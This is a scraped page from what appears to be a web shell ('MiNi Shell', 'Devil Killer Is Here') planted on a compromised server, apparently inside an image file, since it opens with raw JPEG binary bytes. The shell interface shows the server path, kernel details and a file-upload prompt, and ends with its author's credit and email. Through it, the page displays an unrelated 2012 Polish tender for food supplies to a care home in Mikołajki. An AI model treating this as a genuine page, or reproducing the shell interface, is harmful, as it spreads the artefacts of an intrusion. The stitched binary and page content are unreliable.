JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120120/18865-N-2012.html

<p class="kh_header"><b>Mikołajki: Dostawa  artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii   Ewangelicko-Augsburskiej  Św. Trójcy w  Mikołajkach</b><br>
<b>Numer ogłoszenia: 18865 - 2012; data zamieszczenia: 20.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej im. Św. Trójcy , Plac Kościelny 5A, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 87 4216-811, faks 87 4215-049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dompomocy.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ewangelicki Dom Opieki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii   Ewangelicko-Augsburskiej  Św. Trójcy w  Mikołajkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych  do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy w Mikołajkach w okresie od 01 marca 2012 do 28 lutego 2013 roku zgodnie z  wykazem zamieszczonym w grupach I- VI.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.10.00-6, 03.11.00.00-5, 15.50.00.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.11.20.00-6, 15.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dompomocy.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ewangelicki Dom Opieki Arka Plac Kościelny 5A 11-730 Mikołajki księgowość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2012 godzina 08:30, miejsce: Ewangelicki Dom Opieki Arka Plac Kościelny 5A 11-730 Mikołajki księgowość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 500gszt130,Bułka drożdżowa 70gszt 450,Bułka drożdżowa z marmoladą 100g Szt 220,Bułka grahamka 100 g Szt 100,Bułka poznańska 90g Szt16 600,Bułka z makiem zawijana 100g Szt 140,Bułka maślana 70g Szt 500,Chleb razowy krojony 450g
szt 1 300,Chleb ziarnisty krojony 600g szt149,Ciasto makowiec Kg 9,Chleb zwykły krojony 1kg Szt 6 200, Drożdże 500g Kg 10,Eklerki 100g Szt 240,Pączek z marmoladą
Szt 360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz kg 242,Banan Kg 570,Botwina pęczek szt 30,Brzoskwinie kg5,Buraki czerwone
kg 950 Cebula Kg 1 000 Czosnek główka szt 106 Czosnek główka kg15 cytryna Kg 320
Gruszki Kg 140 Fasola szparagowa 15 Grejpfrut Kg 410 Jabłka Kg 1650 Kapusta młoda
Szt 210 Kapusta biała Kg 490 Kapusta czerwona Kg 130 Kapusta kiszona Kg 800 Kapusta pekińska Kg 230 Kalafior Szt 65 Kiwi Kg 40 Kiwi kosz Szt 8 Koper 100g Szt
410 Mak niebieski Kg 3 Marchew młoda Kg 60Marchew kg1250Mandarynka Kg370
Nektarynka Kg 56 Nektarynka kosz Szt 18 Ogórek Kg 680 Ogórki gruntowe
Kg 40 Ogórki małosolne Kg 3 Ogórki kiszone Kg 180 Por Szt 144 Por Kg 265 papryka
kg 150 Pomidory Kg1 000 Pomarańcza siatka Szt 34 Pamarańcza Kg 140 Pietruszka
Kg 25 Pietruszka nać 100g Szt 320 Pieczarki Kg 300 Rodzynki Kg 1,1 Rzodkiewka 100g
Szt 150 Rzodkiew biała Kg 75 Szczypior 100g Szt 240 Seler Kg440 Sałata zielona szt 100 Śliwki Kg19 Sałata lodowa Szt 130 Truskawka Kg 32 Winogrona Kg 150 Wiśnie
Kg 3 Ziemniak młody Kg 2090 Ziemniak Kg 12 000 Zestaw do  kiszenia Szt 10
Grzyby suszone podgrz/borow 50g Szt 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny 350g Szt 200;Jogurt naturalny 150g Szt.1 050;Jogurt naturalny 180 g Szt 204;Jogurt owocowy 115g Szt. 130;Jogurt owocowy 500g Szt.10;
Jogurt owocowy 300g Szt 22;Jogurt owocowy 125g  Danone Gratka lub równoważny
Szt.500;Jogurt owocowy 150g szt.180;Jogurt Danone Activia naturalny 210g lub równoważny Szt.61;Masło extra 200gSzt.23;Mleko słodkie puszka 200ml
Szt.2;Mleko karton 2% 1lSzt120;Maślanka naturalna 1lSzt.300;Margaryna extra z masłem 500g Delma lub równoważna szt 3 000;Margaryna 500g Rama lub równoważna
szt 93;Ser Feta 270g Szt.30;Ser topiony kostka 100g Szt.240;Serek waniliowy 150g Danio lub równoważnySzt.800;Serek waniliowy 140 g Szt.400;Ser żółty Kg 300;Ser wędzony Kg 12,6;Ser pleśniowy 125g President Camembert lub równoważny
Szt 85;Serek gruboziarnisty typu wiejski 200g Szt 347;Serek typu wiejski lekki 150g
Szt 12;Serek 135g Twój Smak lub równoważny Szt 590;Serek 125g Twój Smak lub równoważny Szt 30;Serek puszysty 150g Twój Smak lub równoważny
Szt 200;Ser 270g Favita lub równoważny Szt 12;Śmietana 30% 500ml 
Szt 70;Śmietana 18% 400g Szt 1600;Twaróg chudy 250g Szt 1 899;Twaróg tłusty 250g Szt51; Twaróg półtłusty 250g Szt 153;Twaróg sernikowy 1kg Szt 20;Valbon brie 200g pleśniowy lub równoważny Szt 62;Valbon camembert 180g pleśniowy lub równoważny szt19;Serek Hochland zegarek lub równoważny 200g Szt600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja s 
szt

25 000
Jaja m
Szt.

3 510.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mięso  wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet kurczęcy schłodzony bs
Kg

430
Boczek bk surowy
Kg

110
Boczek wędzony
Kg

230
Flaki wołowe krojone 0,90
op

110

Głowa wp surowa
Kg

50
Golonka konserwowa
Kg

110
Golonka surowa tylna
Kg

10
Gulasz angielski 340g
Szt

50
Gulasz angielski
Kg

200
Indyk faszerowany
Kg

100
Jelita cienkie
Szt

50
Karkówka bk
Kg

250
Kiełbasa biała wp parzona
Kg

35
Kiełbasa domowa
Kg

25
Kiełbasa kanapkowa wp
Kg

20
Kiełbasa firmowa z wędzarni
Kg

35
Kiełbasa madera lub równoważna
Kg

200
Kiełbasa mazowiecka
Kg

250
Kiełbasa parówkowa wp
Kg

120
Kiełbasa piska lub równoważna
Kg

150
Kiełbasa piwna lub równoważna
Kg

200
Kiełbasa zwyczajna
Kg

30
Kiełbasa szynkowa
Kg

120
Kiełbasa wieprzowa z cielęciną
Kg

25
Kiełbasa śląska
Kg

70
Kiełbasa krakowska parzona
Kg

390
Kaszanka 
Kg

35
Kiełbasa ukraińska
kg

70
Klops domowy
Kg

110
Mielonka konserwowa wp
Kg

14
Krew wieprzowa
Litr

10
Kura w galarecie
Kg

80
Kurczak świeży
Kg

130
Luncheon meat
Kg

50
Metka cebulowa
Kg

10
Metka łososiowa
Kg

90
Mielonka tyrolska


160
Mięso kulinarne garmażeryjne 420g
Szt

10
Mortadela luksusowa
Kg

160
Nogi surowe wp
Kg

30
Ogonówka wędzona parzona
Kg

15
Pachwina wp bs
kg

1,5
Parówki Apetitki lub równoważne
Kg

200
Parówki Berlinetki lub równoważne
Kg

220
Kiełbasa parówkowa 
Kg

10
Pasztet wp 160g
Szt

10
Pasztet wp blaszka
Kg

80
Pasztetowa drobiowa
Kg

250
Pieczeń litewska
Kg

60
Pieczeń rzymska
kg

70
Pierś wędzona z indyka
Kg

30
Podgardle wp surowe
Kg

6
Polędwica kanadyjska
Kg

35
Polędwica z warzywami
Kg

40
Polędwica drobiowa
Kg

110
Polędwica miodowa
Kg

25
Polędwica sopocka
Kg

80
Polędwica wiśniowa
Kg

160
Porcje rosołowe kurczęce
Kg

1160
Salami bumerang
Kg

40
Salceson włoski
Kg

150
Schab wp bk
Kg

260
Schab w majeranku
Kg

50
Serdelki wp
Kg

35
Serca drobiowe
Kg

7
Skrzydła kurczęce schłodzone
Kg

335
Słonina wp surowa
Kg

100
Smalec wp 200g
Szt

1200
Smalec wiejski 175g
Szt

20
Szynka surowa bk
Kg

410
Szynka bohuna wp (wędzona gotowana)  
Kg

110
Szynka chłopska
Kg

30
Szynka wiśniowa(wędzonka z łopatki parzona)
Kg

20
Szynka konserwowa
Kg

110
Szynka pieczona
Kg

20
Szynka wędzona tradycyjna
Kg

37
Szynka wędzona z liściem
Kg

66
Szynka wędzona z piersi indyka
Kg

23
Łopatka wp bk
Kg

600
Udziec z indyka surowy
Kg

10
Ćwiartki schłodzone z kurczaka
Kg

1 000
Wątroba kurczęca schłodzona
Kg

100
Wątroba świeża wp
Kg

40
Żeberka paski
Kg

410
Żeberka mostki
Kg

15
Zrazowa górna -udziec wołowy
Kg

36
Żołądki drobiowe świeże
Kg

50
Kiełbasa Żywiecka sucha 
Kg

70
Ozory wp
kg

50
Półtusza wp 
kg

860.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Morszczuk filet
Kg

420
Płat sledziowy solony bez skory 4kg
Szt

70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com